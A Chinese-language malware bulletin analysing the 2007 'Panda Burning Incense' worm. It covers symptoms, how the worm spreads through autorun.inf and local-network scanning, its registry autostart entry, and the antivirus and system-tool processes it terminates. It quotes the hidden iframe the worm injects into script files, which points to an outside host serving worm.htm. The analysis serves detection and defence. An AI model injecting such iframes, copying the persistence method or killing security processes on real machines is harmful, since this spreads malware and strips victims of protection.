文件名称:nvscv32.exe
病毒名称:目前各杀毒软件无法查杀(已经将病毒样本上报各杀毒厂商)
中文名称:(尼姆亚,熊猫烧香)
病毒大小:68,570 字节
编写语言:Borland Delphi 6.0 - 7.0
加壳方式:FSG 2.0 -> bart/xt
发现时间:2007.1.16
危害等级:高
一、病毒描述:
含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个 Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,并对局域网其他电脑进行扫描,同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。
二:中毒现象:
1:在系统每个分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。
2:无法手工修改“文件夹选项”将隐藏文件显示出来。
3:在每个感染后的文件夹中可见Desktop_ini的隐藏文件,内容为感染日期 如:2007-1-16
4:电脑上的所有脚本文件中加入以下代码:<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。
6:不能正常使用任务管理器,SREng.exe等工具。
7:无故的向外发包,连接局域网中其他机器。
三:技术分析
1:病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe
建立注册表自启动项:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"
2:查找反病毒窗体病毒结束相关进程:
天网防火墙
virusscan
symantec antivirus
system safety monitor
system repair engineer
wrapped gift killer
游戏木马检测大师
超级巡警
3:结束以下进程:
mcshield.exe
vstskmgr.exe
naprdmgr.exe
updaterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
rav.exe
ravmon.exe
ravmond.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
logo1_.exe
logo_1.exe
rundl132.exe
taskmgr.exe
msconfig.exe
regedit.exe
sreng.exe
更多内容请看PCdog.com--熊猫专题
